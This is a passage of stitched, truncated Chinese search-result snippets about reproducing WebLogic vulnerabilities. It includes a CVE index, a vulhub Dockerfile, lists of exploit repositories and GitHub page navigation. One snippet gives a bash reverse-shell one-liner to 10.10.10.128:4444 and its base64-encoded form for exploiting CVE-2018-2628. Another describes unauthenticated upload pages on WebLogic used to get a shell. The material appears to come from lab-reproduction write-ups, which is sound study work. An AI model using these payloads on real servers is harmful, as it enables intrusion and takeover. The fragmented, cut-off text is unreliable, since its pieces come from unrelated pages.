输入echo hello,发现是调用的cmd.exe,我这是Linux环境,但是根据报错信息,(假装)已经是复测成功了,就不进一步测试了。 总结 及时打上官方补丁,晚一步服务器就是别人的肉鸡了,在复现的准备过程中将Weblogic服务开了一天,然后就被挂上挖矿的了。 参考资料 https://github.com/vulhub/vulhub/tree/master/weblogic/CV...
一、Weblogic 介绍二、漏洞相关2.1、已收集漏洞2.2、weblogic漏洞扫描工具2.3、常用弱口令2.4、通过任意文件读取来获取weblogic账号密码三、Weblogic-CVE漏洞3.1、2021年3.2、2020年3.2.4、CVE-2020-14645(WebLogicUniversalExtractor反序列化漏洞)3.3、20192.4、2018年 ...
CVE-2018-2628漏洞工具 将bash -i >& /dev/tcp/10.10.10.128/4444 0>&1编码为base64,再使用base64解码,因为因为 Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,编码地址 bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}java-c...
Dockerfile from vulhub/weblogic:10.3.6.0-2017 ENV debugFlag true EXPOSE 7001 EXPOSE 8453 CMD ["/bin/sh","-c","while true;do echo 1;sleep 10;done"] 使用docker-compose up -d启动后进入docker,修改~/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh,在开头加上 debugFl...
https://github.com/pyn3rd/CVE-2018-3191 2.4.4、CVE-2018-2894(Weblogic任意文件上传漏洞) (1)、介绍 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do。 (2)、影响版本 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 (3)、利用...
50 2024-08-12T19:31:38Z jenkins-cve-2016-0792 https://github.com/jpiechowka/jenkins-cve-2016-0792 Exploit for Jenkins serialization vulnerability - CVE-2016-0792 2015 starupdated_atnameurldes 544 2024-12-22T14:00:05Z CVE-2015-7547 https://github.com/fjserna/CVE-2015-7547 Proof of con...
2018 starnameurldes 1483weblogicScannerhttps://github.com/0xn0ne/weblogicScannerweblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-...
50 2022-06-25T01:31:15Z jenkins-cve-2016-0792 https://github.com/jpiechowka/jenkins-cve-2016-0792 Exploit for Jenkins serialization vulnerability - CVE-2016-0792 82 2021-12-29T03:39:19Z mach_race https://github.com/gdbinit/mach_race Exploit code for CVE-2016-1757 39 2023-02-01T00:...
- https://github.com/Echocipher/Resource-list - https://github.com/Neo01010/frida-all-in-one - https://github.com/Ondrik8/RED-Team - https://github.com/PwnAwan/Vmware-Exploitation - https://github.com/WinMin/awesome-vm-exploit - https://github.com/dk47os3r/hongduiziliao - https:...
Explore All features Documentation GitHub Skills Blog Solutions By company size Enterprises Small and medium teams Startups Nonprofits By use case DevSecOps DevOps CI/CD View all use cases By industry Healthcare Financial services Manufacturing Government View all industries View all sol...